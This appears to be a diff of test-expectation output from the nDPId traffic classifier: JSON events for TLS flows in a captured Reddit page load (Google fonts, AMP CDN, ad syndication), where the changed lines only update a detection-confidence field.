00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9311,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgRAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuVFgHH2llkCsoHoBJXgJ6iAAACBAV4AQMDAwQCCArC10u9qlQMrQ=="} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9312,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygcBx9pagBAB+yKXAAABAQgKqlQMysLXS70="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9313,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9314,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9313,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9314,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9315,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZEy\/C8or4r7coBJXgC2BAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9316,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZgWfUkJjbNefoBJXgN3ZAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9317,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtxMvwvLgBAB+7F0AAABAQgKuJU7UsLXS74="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns158Fn1JDgBAB+2HNAAABAQgKuJU7UsLXS74="} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9319,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9320,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9319,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9320,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9321,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQan0Owi4YaAsmoBJXgA33AAACBAV4AQMDAwQCCArC10u\/uJU7NA=="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9322,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQaPhCx3meEC1CoBJXgOW1AAACBAV4AQMDAwQCCArC10u+uJU7NA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9323,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyZ9DsIvgBAB+5HpAAABAQgKuJU7U8LXS78="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9324,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUL4Qsd6gBAB+2moAAABAQgKuJU7U8LXS74="} 
-00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9325,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9326,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690990,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9325,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9326,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690990,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690992,"flow_last_seen":1605291690992,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690992,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1605291690992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690992,"pkt":"qtsDr8lk5EKm5WPyht1gDPazACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGcAAAAAoAL9IIFCAAACBAWgBAIICriVO3YAAAAAAQMDBw=="} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9359,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690994,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9373,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9391,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690998,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691002,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 